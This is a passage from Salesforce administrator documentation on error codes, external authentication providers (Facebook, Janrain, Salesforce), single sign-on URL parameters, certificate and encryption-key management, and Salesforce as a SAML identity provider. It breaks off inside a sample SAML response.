MISMATCH_FEDERATION_ID_AND_USERNAME_ATTRSFederation ID and username do not match12

UNSUPPORTED_VERSIONUnsupported provision API version13

USER_NAME_CHANGE_NOT_ALLOWEDUsername change isn't allowed14

UNSUPPORTED_CUSTOM_FIELD_TYPECustom field type isn't supported15

PROFILE_NAME_LOOKUP_ERRORUnable to map an unique profile ID for the
given profile name

16

ROLE_NAME_LOOKUP_ERRORUnable to map an unique role ID for the
given role name

17

INVALID_ACCOUNT_IDInvalid account18

MISSING_ACCOUNT_NAMEMissing account name19

MISSING_ACCOUNT_NUMBERMissing account number20

ACCOUNT_CREATION_API_ERRORUnable to create account22

INVALID_CONTACTInvalid contact23

MISSING_CONTACT_EMAILMissing contact email24

MISSING_CONTACT_LAST_NAMEMissing contact last name25

CONTACT_CREATION_API_ERRORUnable to create contact26

MULTIPLE_CONTACTS_FOUNDMultiple matching contacts found27

MULTIPLE_ACCOUNTS_FOUNDMultiple matching accounts found28

INVALID_ACCOUNT_OWNERInvalid account owner30

INVALID_PORTAL_PROFILEInvalid portal profile31

ACCOUNT_CHANGE_NOT_ALLOWEDAccount change is not allowed32

ACCOUNT_UPDATE_FAILEDUnable to update account33

CONTACT_UPDATE_FAILEDUnable to update contact34

INVALID_STANDARD_ACCOUNT_FIELD_VALUEInvalid standard account field value35

CONTACT_CHANGE_NOT_ALLOWEDContact change not allowed36

INVALID_PORTAL_ROLEInvalid portal role37

See Also:
About Just-in-Time Provisioning for SAML
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About External Authentication Providers
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND

“Manage Auth. Providers”

To edit the settings:

You can enable users to log into your Salesforce organization using their login credentials from an external service provider
such as Facebook© or Janrain©. You must do the following to successfully set up an authentication provider for single sign-on.

• Correctly configure the service provider website.

• Create a registration handler using Apex.

• Define the authentication provider in your organization.

After your authentication provider is set up, the basic flow is the following.

1. The user tries to login to Salesforce using a third party identity.
2. The login request is redirected to the third party authentication provider.
3. The user performs the third party login and approves access.
4. The authentication provider redirects the user to Salesforce with credentials.
5. The user is signed into Salesforce.

Note:  If a user has an existing Salesforce session, after authentication with the third party they are automatically
redirected to the page where they can approve the link to their Salesforce account.

Defining Your Authentication Provider

We support the following providers:

• Facebook
• Janrain
• Salesforce

Adding Functionality to Your Authentication Provider

You can add functionality to your authentication provider by using additional request parameters.

• Scope – Customizes the permissions requested from the third party
• Site – Enables the provider to be used with a site
• StartURL – Sends the user to a specified location after authentication
• Community – Sends the user to a specific community after authentication
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Creating an Apex Registration Handler

A registration handler class is required to use Authentication Providers for the single sign-on flow. The Apex registration
handler class must implement the Auth.RegistrationHandler interface, which defines two methods. Salesforce invokes
the appropriate method on callback, depending on whether the user has used this provider before or not. When you create
the authentication provider, you can automatically create an Apex template class for testing purposes. For more information,
see Auth.RegistrationHandler in the Force.com Apex Code Developer's Guide.

Configuring a Facebook Authentication Provider

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND

“Manage Auth. Providers”

To edit the settings:

To use Facebook as an authentication provider:

1. Set up a Facebook application, making Salesforce the application domain.
2. Define a Facebook authentication provider in your Salesforce organization.
3. Update your Facebook application to use the Callback URL generated by Salesforce as the Facebook Website Site

URL.
4. Test the connection.

Setting up a Facebook Application

Before you can configure Facebook for your Salesforce organization, you must set up an application in Facebook:

1. Go to the Facebook website and create a new application.
2. Modify the application settings and set the Application Domain to Salesforce.
3. Note the Application ID and the Application Secret.

Defining a Facebook Provider in your Salesforce Organization

You need the Facebook Application ID and Application Secret to set up a Facebook provider in your Salesforce organization.

1. From Setup, click Security Controls > Auth. Providers.
2. Click New.
3. Select Facebook for the Provider Type.
4. Enter a Name for the provider.
5. Enter the URL Suffix. This is used in the client configuration URLs. For example, if the URL suffix of your provider

is “MyFacebookProvider”, your single sign-on URL is similar to:
https://login.salesforce.com/auth/sso/00Dx00000000001/MyFacebookProvider.

6. Use the Application ID from Facebook for the Consumer Key field.
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7. Use the Application Secret from Facebook for the Consumer Secret field.
8. Optionally enter a custom error URL for the provider to use to report any errors.
9. Select an already existing Apex class as the Registration Handler class or click Automatically create a

registration handler template to create an Apex class template for the registration handler. You must edit this
class and modify the default content before using it.

Note:  You must specify a registration handler class for Salesforce to generate the Single Sign-On
Initialization URL.

10. Select the user that runs the Apex handler class for Execute Registration As. The user must have “Manage Users” permission.
A user is required if you selected a registration handler class or are automatically creating one.

11. To use a portal with your provider, select the portal from the Portal drop-down list.
12. Click Save.

Be sure to note the generated Auth. Provider Id value. You must use it with the Auth.AuthToken Apex class.

Several client configuration URLs are generated after defining the authentication provider:

• Test-Only Initialization URL: Administrators use this URL to ensure the third-party provider is set up correctly.
The administrator opens this URL in a browser, signs in to the third party, and is redirected back to Salesforce with a map
of attributes.

• Single Sign-On Initialization URL: Use this URL to perform single sign-on into Salesforce from a third party
(using third-party credentials). The end user opens this URL in a browser, and signs in to the third party. This then either
creates a new user for them, or updates an existing user, and then signs them into Salesforce as that user.

• Existing User Linking URL: Use this URL to link existing Salesforce users to a third-party account. The end user
opens this URL in a browser, signs in to the third party, signs in to Salesforce, and approves the link.

• Callback URL: Use the callback URL for the endpoint that the authentication provider calls back to for configuration.
The authentication provider has to redirect to the Callback URL with information for each of the above client configuration
URLs.

The client configuration URLs support additional request parameters that enable you to direct users to log into specific sites,
obtain customized permissions from the third party, or go to a specific location after authenticating.

Updating Your Facebook Application

After defining the Facebook authentication provider in your Salesforce organization, go back to Facebook and update your
application to use the Callback URL as the Facebook Website Site URL.

Testing the Single Sign-On Connection

In a browser, open the Test-Only Initialization URL on the Auth. Provider detail page. It should redirect you to
Facebook and ask you to sign in. Upon doing so, you are asked to authorize your application. After you authorize, you are
redirected back to Salesforce.

See Also:
Using Request Parameters with Client Configuration URLs
About External Authentication Providers
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Configuring a Janrain Authentication Provider

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND

“Manage Auth. Providers”

To edit the settings:

Setting up a Janrain authentication provider is slightly different from setting up other providers. You don’t use the Single
Sign-On Initialization URL that you obtain after registering your provider with Salesforce to start the flow. Instead you use
Janrain’s login widget that’s deployed on your site.

To set up your Janrain provider:

1. Register your application with Janrain and get an apiKey.
2. Define the Janrain authentication provider in your Salesforce organization.
3. Get the login widget code from Janrain.
4. Set up a site that calls the login widget code in your Salesforce organization.

Registering Your Application

You must sign up for a Janrain account from the Janrain website. Once you have your Janrain account, you need the apiKey.

1. Click Deployment > Sign-in for Web > Handle Tokens.
2. Copy the apiKey. You need this when creating the Janrain provider in your Salesforce organization.
3. Add salesforce.com to the Janrain domain whitelist in your Janrain account at Deployment > Application Settings

> Domain Whitelist.

Defining the Janrain Provider in your Salesforce Organization

You need the Janrain apiKey to create a Janrain provider in your Salesforce organization.

1. From Setup, click Security Controls > Auth. Providers.
2. Click New.
3. Select Janrain for the Provider Type.
4. Enter a Name for the provider.
5. Enter the URL Suffix. This is used in the Callback URL. For example, if the URL suffix of your provider is

“MyJanrainProvider”, your Callback URL is similar to
https://login.salesforce.com/services/authcallback/00D300000007CvvEAE/MyJanrainProvider.

6. Use the Janrain apiKey value for the Consumer Secret.
7. Optionally enter a custom error URL for the provider to use to report any errors.
8. Select an already existing Apex class as the Registration Handler class or click Automatically create a

registration handler template to create the Apex class template for the registration handler. You must edit this
class to modify the default content before using it.
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Note:  You must specify a registration handler class for Salesforce to use single sign-on.

9. Select the user that runs the Apex handler class for Execute Registration As. The user must have “Manage Users” permission.
A user is required if you selected a registration handler class or are automatically creating one.

10. To use a portal with your provider, select the portal from the Portal drop-down list.
11. Click Save.

Note the value of the generated Callback URL. You need it to complete the Janrain setup.

Several client configuration parameters are available after configuring Janrain as the authentication provider. Use these for the
flowtype value in the Callback URL with your Janrain login widget:

• test: Use this parameter to make sure the third-party provider is set up correctly. The administrator configures a Janrain
widget to use flowtype=test, signs in to the third party, and is redirected back to Salesforce with a map of attributes.

• link: Use this parameter to link existing Salesforce users to a third-party account . The end user goes to a page with a
Janrain widget configured to use flowtype=link, signs in to the third party, signs in to Salesforce, and approves the
link.

• sso: Use this parameter to perform single sign-on into Salesforce from a third party (using third-party credentials). The
end user goes to a page with a Janrain widget configured to use flowtype=sso, and signs in to the third party. This then
either creates a new user for them, or updates an existing user, and then signs them into Salesforce as that user.

The client configuration URLs support additional request parameters that enable you to direct users to log into specific sites,
obtain customized permissions from the third party, or go to a specific location after authenticating.

Getting the Login Widget Code from Janrain

You need to get the login widget code from Janrain for your Salesforce organization.

1. From your Janrain account, click Application > Sign-in for Web > Get the Code.
2. Enter the Callback URL value from your Janrain provider information in your Salesforce organization along with the

query parameter flowtype=sso as the token URL. For example,
https://login.salesforce.com/services/authcallback/00DD0000000JWFwMAB/JanrainApp?flowtype=sso.
To use My Domain, replace login.salesforce.com with your My Domain name.

Creating a Site to Call the Login Widget

1. Enable Sites.
2. Create a page and copy the login widget code to the page.
3. Create a new site and specify the page you just created as the home page for the site.

See Also:
Using Request Parameters with Client Configuration URLs
About External Authentication Providers
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Configuring a Salesforce Authentication Provider

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND

“Manage Auth. Providers”

To edit the settings:

You can use a remote access application as an authentication provider. You must complete these steps:

1. Define a remote access application.
2. Define a Salesforce authentication provider in your organization.
3. Test the connection.

Defining a Remote Access Application

Before you can configure a Salesforce provider for your Salesforce organization, you must define a remote access application
that uses single sign-on. Define remote access applications under Setup, in Develop > Remote Access.

After you finish defining a remote access application, save the values from the Consumer Key and Consumer Secret fields.

Defining the Salesforce Authentication Provider in your Organization

You need the values from the Consumer Key and Consumer Secret fields of the remote access application definition to
set up the authentication provider in your organization.

1. From Setup, click Security Controls > Auth. Providers.
2. Click New.
3. Select Salesforce for the Provider Type.
4. Enter a Name for the provider.
5. Enter the URL Suffix. This is used in the client configuration URLs. For example, if the URL suffix of your provider

is “MySFDCProvider”, your single sign-on URL is similar to
https://login.salesforce.com/auth/sso/00Dx00000000001/MySFDCProvider.

6. Paste the value of Consumer Key from the remote access application definition into the Consumer Key field.
7. Paste the value of Consumer Secret from the remote access application definition into the Consumer Secret field.
8. Optionally enter a custom error URL for the provider to use to report any errors.
9. Select an already existing Apex class as the Registration Handler class or click Automatically create a

registration handler template to create the Apex class template for the registration handler. You must edit this
template class to modify the default content before using it.

Note:  You must specify a registration handler class for Salesforce to generate the Single Sign-On
Initialization URL.
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10. Select the user that runs the Apex handler class for Execute Registration As. The user must have “Manage Users”
permission. A user is required if you selected a registration handler class or are automatically creating one.

11. To use a portal with your provider, select the portal from the Portal drop-down list.
12. Click Save.

Note the value of the Client Configuration URLs. You need the Callback URL to complete the last step, and you use
the Test-Only Initialization URL to check your configuration. Also be sure to note the Auth. Provider Id
value because you must use it with the Auth.AuthToken Apex class.

13. Return to the remote access application definition you created above and paste the value of Callback URL from the
authentication provider into the Callback URL field.

Several client configuration URLs are generated after defining the authentication provider:

• Test-Only Initialization URL: Administrators use this URL to ensure the third-party provider is set up correctly.
The administrator opens this URL in a browser, signs in to the third party, and is redirected back to Salesforce with a map
of attributes.

• Single Sign-On Initialization URL: Use this URL to perform single sign-on into Salesforce from a third party
(using third-party credentials). The end user opens this URL in a browser, and signs in to the third party. This then either
creates a new user for them, or updates an existing user, and then signs them into Salesforce as that user.

• Existing User Linking URL: Use this URL to link existing Salesforce users to a third-party account. The end user
opens this URL in a browser, signs in to the third party, signs in to Salesforce, and approves the link.

• Callback URL: Use the callback URL for the endpoint that the authentication provider calls back to for configuration.
The authentication provider has to redirect to the Callback URL with information for each of the above client configuration
URLs.

The client configuration URLs support additional request parameters that enable you to direct users to log into specific sites,
obtain customized permissions from the third party, or go to a specific location after authenticating.

Testing the Single Sign-On Connection

In a browser, open the Test-Only Initialization URL on the Auth. Provider detail page. Both the authorizing
organization and target organization must be in the same environment, such as production or a sandbox.

See Also:
Using Request Parameters with Client Configuration URLs
About External Authentication Providers

Using Request Parameters with Client Configuration URLs
You can add functionality to your authentication provider by using additional request parameters.

Available in: Professional, Enterprise, Unlimited, and Developer Editions
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User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND
“Manage Auth. Providers”

To edit the settings:

Authentication providers support additional request parameters you can use to direct users to log into specific sites, obtain
customized permissions from the third party, or go to a specific location after authenticating.

Add the request parameters to the following client configuration URLs. These were generated after you defined your
authentication provider:

• Test-Only Initialization URL

• Single Sign-On Initialization URL

• Existing User Linking URL

• Callback URL

Append any of these parameters to your URL as needed. For Janrain providers, append them to the appropriate callback URL.

• Scope – Customizes the permissions requested from the third party

• Site – Enables the provider to be used with a site

• StartURL – Sends the user to a specified location after authentication

• Community – Sends the user to a specific community after authentication

Using the Scope Parameter
Customizes the permissions requested from the third party like Facebook or Janrain so that the returned access token has
additional permissions.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND
“Manage Auth. Providers”

To edit the settings:

You can customize requests to a third party to receive access tokens with additional permissions. Then you use Auth.AuthToken
methods to retrieve the access token that was granted so you can use those permissions with the third party. The default scopes
vary depending on the third party, but usually do not allow access to much more than basic user information.
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The space-delimited string of requested scopes is sent as-is to the third party, and overrides the default permissions requested
by authentication providers.

Janrain does not use this parameter; additional permissions must be configured within Janrain.

The following is an example of a scope parameter requesting the Salesforce scopes api and web, added to the Single
Sign-On Initialization URL, where:

• orgID is your Auth. Provider ID
• URLsuffix is the value you specified when you defined the authentication provider

https://login.salesforce.com/services/auth/sso/orgID/URLsuffix?scope=id%20api%20web

Valid scopes vary depending on the third party; refer to your individual third-party documentation. For example, Salesforce
scopes are:

DescriptionValue

Allows access to the current, logged-in user’s account over the APIs, such as the REST API
or Bulk API. This also includes the chatter_api, allowing access to Chatter API resources.

api

Allows access to only the Chatter API resources.chatter_api

Allows access to all data accessible by the logged-in user. full does not return a refresh
token. You must explicitly request the refresh_token scope to get a refresh token.

full

Allows access only to the identity URL service.id

Allows a refresh token to be returned if you are eligible to receive one.refresh_token

Allows access to Visualforce pages.visualforce

Allows the ability to use the access_token on the Web. This also includes visualforce,
allowing access to Visualforce pages.

web

See Also:
Using Request Parameters with Client Configuration URLs

Using the Site Parameter
Use your authentication provider to log into a site or link to a sites user.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND
“Manage Auth. Providers”

To edit the settings:
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To use your provider with a site, you need to do the following:

• Enable the provider to be used with a site

• Ensure the site is configured to use the same portal

• Add the site-specific login URL information to the appropriate client configuration URL, such as the Single Sign-On
Initialization URL, using the site parameter

You create the site login Visualforce page, or specify the default page, when you create the site. An example site login URL
is: https%3A%2F%2Fmysite.force.com%2FSiteLogin.

The following is an example of a site-login URL added to the Single Sign-On Initialization URL, using the site
parameter, where:

• orgID is your Auth. Provider ID
• URLsuffix is the value you specified when you defined the authentication provider

https://login.salesforce.com/services/auth/sso/orgID/URLsuffix?site=https%3A%2F%2Fmysite.force.com%2FSiteLogin

If you don’t specify a site parameter, the user proceeds either to a standard portal (if set up for a portal) or the standard
application (if not).

See Also:
Using Request Parameters with Client Configuration URLs

Using the StartURL Parameter
Send your user to a specific location after authenticating or linking.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND
“Manage Auth. Providers”

To edit the settings:

To direct your users to a specific location after authenticating, you need to specify a URL with the startURL request parameter.
This URL must be a relative URL; passing an absolute URL results in an error. If you don’t add startURL, the user is sent
to either /home/home.jsp (for a portal or standard application) or to the default sites page (for a site) after authentication
completes.

For example, with a Single Sign-On Initialization URL, the user is sent to this location after being logged in. For
an Existing User Linking URL, the “Continue to Salesforce” link on the confirmation page leads to this page.

The following is an example of a startURL parameter added to the Single Sign-On Initialization URL, where:

• orgID is your Auth. Provider ID
• URLsuffix is the value you specified when you defined the authentication provider
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https://login.salesforce.com/services/auth/sso/orgID/URLsuffix?startURL=%2F005x00000000001%3Fnoredirect%3D1

See Also:
Using Request Parameters with Client Configuration URLs

Using the Community URL Parameter
Send your user to a specific Community after authenticating.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view the settings:

“Customize Application”

AND
“Manage Auth. Providers”

To edit the settings:

To direct your users to a specific community after authenticating, you need to specify a URL with the community request
parameter. If you don’t add the parameter, the user is sent to either /home/home.jsp (for a portal or standard application)
or to the default sites page (for a site) after authentication completes.

For example, with a Single Sign-On Initialization URL, the user is sent to this location after being logged in. For
an Existing User Linking URL, the “Continue to Salesforce” link on the confirmation page leads to this page.

The following is an example of a community parameter added to the Single Sign-On Initialization URL, where:

• orgID is your Auth. Provider ID
• URLsuffix is the value you specified when you defined the authentication provider

https://login.salesforce.com/services/auth/sso/orgID/URLsuffix?community=https://acme.force.com/support

About Salesforce Certificates and Keys
Available in: All Editions

User Permissions Needed

“Customize Application”To create, edit, and manage certificates:

To work with Salesforce certificates and keys, from Setup, click Security Controls > Certificate and Key Management. From
this page you can:
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• Manage your certificates

• Manage your master encryption key

Certificates

Salesforce certificates and key pairs are used for signatures that verify a request is coming from your organization. They are
used for authenticated SSL communications with an external web site, or when using your organization as an Identity Provider.
You only need to generate a Salesforce certificate and key pair if you're working with an external website that wants verification
that a request is coming from a Salesforce organization.

Salesforce offers two types of certificates:

Self-signed
A self-signed certificate is signed by Salesforce. Not all external websites accept self-signed certificates.

CA-signed
A CA-signed certificate is signed by an external certificate authority (CA). Most external websites accept CA-signed
certificates. You must first generate the certificate signing request to send to a CA, and then import the signed version
of the certificate before you can use it.

Master Encryption Keys

Fields that are encrypted using encrypted custom fields, such as social security number or credit card number, use a master
encryption key to encrypt the data. This key is automatically assigned when you enable encrypted fields for your organization.
You can manage the master key based on your organization’s security needs and regulatory requirements.

See Also:
Creating Certificates and Key Pairs
Uploading Certificate Authority (CA)-Signed Certificates
Managing Master Encryption Keys
Editing Salesforce Certificates and Key Pairs

Creating Certificates and Key Pairs

Available in: All Editions

User Permissions Needed

“Customize Application”To create, edit, and manage certificates:

Salesforce offers two types of certificates:

Self-signed

A self-signed certificate is signed by Salesforce. Not all external websites accept self-signed certificates.
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CA-signed

A CA-signed certificate is signed by an external certificate authority (CA). Most external websites accept CA-signed
certificates. You must first generate the certificate signing request to send to a CA, and then import the signed version
of the certificate before you can use it.

To create a Salesforce certificate:

1. From Setup, click Security Controls > Certificate and Key Management.
2. Select either Create Self-Signed Certificate or Create CA-Signed Certificate, based on what kind of certificate your

external website accepts. You can’t change the type of a certificate after you’ve created it.
3. Enter a descriptive label for the Salesforce certificate. This name is used primarily by administrators when viewing certificates.
4. Enter the Unique Name. This name is automatically populated based on the certificate label you enter. This name can

contain only underscores and alphanumeric characters, and must be unique in your organization. It must begin with a
letter, not include spaces, not end with an underscore, and not contain two consecutive underscores. Use the Unique
Name when referring to the certificate using the Force.com Web services API or Apex.

5. Select a Key Size for your generated certificate and keys. We recommend that you use the default key size of 2048 for
security reasons. Selecting 2048 generates a certificate using 2048-bit keys and is valid for two years. Selecting 1024
generates a certificate using 1024-bit keys and is valid for one year.

Note:  Once you save a Salesforce certificate, you can’t change the key size.

6. If you’re creating a CA-signed certificate, you must also enter the following information. These fields are joined together
to generate a unique certificate.

DescriptionField

The fully qualified domain name of the company requesting
the signed certificate. This is generally of the form:
http://www.mycompany.com.

Common Name

The email address associated with this certificate.Email Address

Either the legal name of your company, or your legal name.Company

The branch of your company using the certificate, such as
marketing or accounting.

Department

The city where the company resides.City

The state where the company resides.State

A two-letter code indicating the country where the company
resides. For the United States, the value is US.

Country Code

7. Click Save.

After you successfully save a Salesforce certificate, the certificate and corresponding keys are automatically generated.

You can have a maximum of 50 certificates.

After you create a CA-signed certificate, you must upload the signed certificate before you can use it.
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Note:  After you create a CA-signed certificate and certificate request, the certificate is not active and you can’t use
it until it’s been signed by a certificate authority and uploaded into your organization.

See Also:
About Salesforce Certificates and Keys

Uploading Certificate Authority (CA)-Signed Certificates

Available in: All Editions

User Permissions Needed

“Customize Application”To create, edit, and manage certificates:

After you create a CA-signed certificate, you must do the following before the certificate is active and you can use the certificate.

1. From Setup, click Security Controls > Certificate and Key Management, click the name of the certificate, then click
Download Certificate Signing Request.

2. Send the certificate request to the certificate authority of your choice.
3. After the certificate authority sends back the signed certificate, from Setup, click Security Controls > Certificate and Key

Management, click the name of the certificate, then click Upload Signed Certificate.
4. Click Browse to locate the CA-signed certificate. The CA-signed certificate must match the certificate created in Salesforce.

If you try to upload a different CA-signed certificate, the upload fails.
5. Click Save to finish the upload process. Click Cancel at any time to not upload the certificate.

After you successfully upload the signed certificate, the status of the certificate is changed to Active and you can use CA-signed
certificate.

Note:  You can’t delete a CA-signed certificate after you’ve uploaded the signed certificate.

See Also:
About Salesforce Certificates and Keys
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Managing Master Encryption Keys

Available in: All Editions

User Permissions Needed

“Customize Application”To create, edit, and manage certificates:

Fields that are encrypted using encrypted custom fields, such as social security number or credit card number, use a master
encryption key to encrypt the data. This key is automatically assigned when you enable encrypted fields for your organization.
You can manage the master key based on your organization’s security needs and regulatory requirements. With master encryption
keys, you can do the following:

• Archive the existing key and create a new key

• Export an existing key after it's been archived

• Delete an existing key

• Import an existing key after it's been deleted

Archiving and Creating New Keys

To archive your current key and create a new key:

1. From Setup, click Security Controls > Certificate and Key Management.
2. Click Archive Current Key and Create New Key.
3. A warning message displays letting you know you are changing keys. Click OK.
4. A new key is generated, assigned the next sequential number, and activated.

All new data is encrypted using the new key. Existing data continues to use the archived key until the data is modified and
saved. Then data is encrypted using the new key.

After you archive a key, you can export or delete it.

Exporting Keys

You can export your keys to a back-up location for safe keeping. It’s a good idea to export a copy of any key before deleting
it.

Exporting creates a text file with the encrypted key. You can import the key back into your organization at a later time.

Click Export next to the key you want to export.

Deleting Keys

Don't delete a key unless you're absolutely certain no data is currently encrypted using the key. After you delete a key, any data
encrypted with that key can no longer be accessed. If you export the key before you delete it, you can import the key back into
your organization.

To delete a key, click Delete next to the key you want to delete.

The date the key is deleted displays.
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Importing Keys

If you have data associated with a deleted key, you can import an exported key back into your organization. Any data that was
not accessible becomes accessible again.

Click Import next to the key you want to import.

See Also:
About Salesforce Certificates and Keys

Editing Salesforce Certificates and Key Pairs

Available in: All Editions

User Permissions Needed

“Customize Application”To create, edit, and manage certificates:

After you create a Salesforce certificate, you can only change the Label and the Unique Name. You can’t change the type,
key size, and so on. The certificate and the keys aren’t regenerated when you edit a Salesforce certificate.

Warning: Apex and the Force.com Web services API use the Unique Name to access the certificate. Changing the
Unique Name could cause your code to break.

To edit a Salesforce certificate:

1. From Setup, click Security Controls > Certificate and Key Management.
2. Click Edit next to the name of a Salesforce certificate.
3. Make your changes, then click Save.

To delete a certificate, click Del. If a certificate is being used as part of the configuration of your identity provider, you cannot
delete it.

Note:  You can’t delete a CA-signed certificate after you’ve uploaded the signed certificate.

See Also:
About Salesforce Certificates and Keys

638

About Salesforce Certificates and KeysSecurity



Viewing Salesforce Certificates and Key Pairs

Available in: All Editions

User Permissions Needed

“Customize Application”To create, edit, and manage certificates:

To view the details of a Salesforce certificate, from Setup, click Security Controls > Certificate and Key Management, then
click the name of a certificate.

From the certificate detail page, you can do any of the following:

• Click Edit to edit the label or unique name of the certificate.

• Click Delete to delete the certificate.

Note:  You can’t delete a CA-signed certificate after you’ve uploaded the signed certificate.

• Click Download Certificate to download the full Base-64 encoded certificate. This is only available for active certificates.
For CA-signed certificates, you must first upload the signed certificate before you can download or use it.

• Click Download Certificate Signing Request for CA-signed certificates that have not yet had the signed certificate
uploaded.

• Click Upload Signed Certificate to upload the CA-signed certificate.

See Also:
About Salesforce Certificates and Keys

About Identity Providers and Service Providers
Available in: Developer, Enterprise, Unlimited, and Database.com Editions

User Permissions Needed

“Customize Application”Define and modify identity providers and service providers:

An identity provider is a trusted provider that enables you to use single sign-on to access other websites. A service provider is a
website that hosts applications. You can enable Salesforce as an identity provider, then define one or more service providers,
so your users can access other applications directly from Salesforce using single sign-on. This can be a great help to your users:
instead of having to remember many passwords, they will only have to remember one. Plus, the applications can be added as
tabs to your Salesforce organization, which means users won’t have to switch between programs.
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Before you can enable Salesforce as an identity provider, you must set up a domain.

Enabling Salesforce as an identity provider requires a self-signed Salesforce certificate and key pair. If you haven’t generated
a Salesforce certificate and key pair, one is automatically created for you when you enable Salesforce as an identity provider.
You also have the option of picking an already generated certificate, or creating one yourself.

Salesforce uses the SAML 2.0 standard for single sign-on and generates SAML assertions when configured as an identity
provider.

Use the identity provider event log if your users have errors when trying to log into your service provider’s apps.

Using Identity Providers and Service Providers

Salesforce supports the following:

• Identity-provider-initiated login—when Salesforce logs into a service provider at the initiation of the end-user
• Service-provider-initiated login—when the service provider requests Salesforce to authenticate a user, at the initiation of

the end-user

The following is the general flow when Salesforce as an identity provider logs into a service provider.

1. User tries to access a service provider already defined in Salesforce.
2. Salesforce sends a SAML response to the service provider.
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3. Service provider identifies the user and authenticates the certificate.
4. If the user is identified, they are logged into the service provider.

The following is the general flow when a service provider initiates login and uses Salesforce to identify the user.

1. The service provider sends a valid SAML request. The endpoint is automatically generated when the service provider is
defined—the SP-Initiated POST Endpoint.

2. Salesforce identifies the user included in the SAML request.

<samlp:AuthnRequest ID="bndkmeemcaamihajeloilkagfdliilbhjjnmlmfo" Version="2.0"
IssueInstant="2010-05-24T22:57:19Z"
ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"
ProviderName="google.com" IsPassive="false"
AssertionConsumerServiceURL="https://www.google.com/a/resp.info/acs">
<saml:Issuer>google.com</saml:Issuer>
<samlp:NameIDPolicy AllowCreate="true"
Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified"/>

</samlp:AuthnRequest>

If a certificate was included as part of the definition, Salesforce authenticates the certificate.
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Note:  If a certificate is included in the service provider definition, and the SAML request does not contain a
certificate, the request fails, and the user is not logged in using Salesforce. If the definition does not include a
certificate, and the request includes a signature, the request succeeds if the user is identified correctly.

3. If the user isn’t already logged into Salesforce, they are prompted to do so.
4. Salesforce sends a SAML response to the service provider.
5. The service provider authenticates the SAML response sent by Salesforce. If the user has been authenticated, they are

logged into the service provider. The user is also logged into Salesforce.

Important: Salesforce doesn’t provide any mechanism for automatically logging the user out of Salesforce when
they log out of the service provider.

The following is an example of the SAML response from Salesforce. You might want to share this information with your
service provider.

<samlp:Response Destination="https://login-blitz03.soma.salesforce.com/
?saml=MgoTx78aEPa2r1BHKCHmlfUKhH2mkDrXOjmYcjHG_qNDbsRM_6ZAo.wvGk"
ID="_0f551f9288c8b76f21c3d4d15c9cd1df1290476801091"
InResponseTo="_2INwHuINDJTvjo8ohcM.Fpw_uLukYi0WArVx2IJD569kZYL
osBwuiaSbzzxOPQjDtfw52tJB10VfgPW2p5g7Nlv5k1QDzR0EJYGgn0d0z8
CIiUOY31YBdk7gwEkTygiK_lb46IO1fzBFoaRTzwvf1JN4qnkGttw3J6L4b
opRI8hSQmCumM_Cvn3DHZVN.KtrzzOAflcMFSCY.bj1wvruSGQCooTRSSQ"

IssueInstant="2010-11-23T01:46:41.091Z" Version="2.0">
<saml:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity"
>identityorg.blitz03.blitz.salesforce.com</saml:Issuer>
−
<ds:Signature>
−
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
−
<ds:Reference URI="#_0f551f9288c8b76f21c3d4d15c9cd1df1290476801091">
−
<ds:Transforms>
<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
−
<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#">
<ec:InclusiveNamespaces PrefixList="ds saml samlp xs"/>
</ds:Transform>
</ds:Transforms>
<ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/>
<ds:DigestValue>4NVTbQ2WavD+ZBiyQ7ufc8EhtZw=</ds:DigestValue>
</ds:Reference>
</ds:SignedInfo>
−
<ds:SignatureValue>

eqrkFxNlJRCT4VQ7tt7wKZGK7oLCCCa4gV/HNcL03RoKbSXIcwU2CAqW0qTSj25FqhRe2fOwAYa5
xFWat7Fw2bbncU+/nnuVNZut8HEEQoHiQA/Jrh7XB4CNlOpM1QRvgB5Dtdkj/0lI4h3X3TFix57B
sgZJGbb5PWEqSH3ZAl+NPvW9nNtYQIFyCTe9+cw2BhCxFgSWfP3/kIYHSM2gbIy27CrRrFS1lAqP
hKSLaH+ntH1E09gp78RSyJ2WKFGJU22sE9RJSZwdVw3VGG06Z6RpSjPJtaREELhhIBWTHNoF+VvJ
2Hbexjew6CO08lXRDe8dbrrPIRK/qzHZYf1H0g==
</ds:SignatureValue>
−
<ds:KeyInfo>
−
<ds:X509Data>
−
<ds:X509Certificate>
MIIEbjCCA1agAwIBAgIOASh04QulAAAAAClXs7MwDQYJKoZIhvcNAQEFBQAwfTEVMBMGA1UEAwwM
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==
</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</ds:Signature>
−
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
−
<saml:Assertion ID="_e700bf9b25a5aebdb9495fe40332ef081290476801092"
IssueInstant="2010-11-23T01:46:41.092Z" Version="2.0">
<saml:Issuer
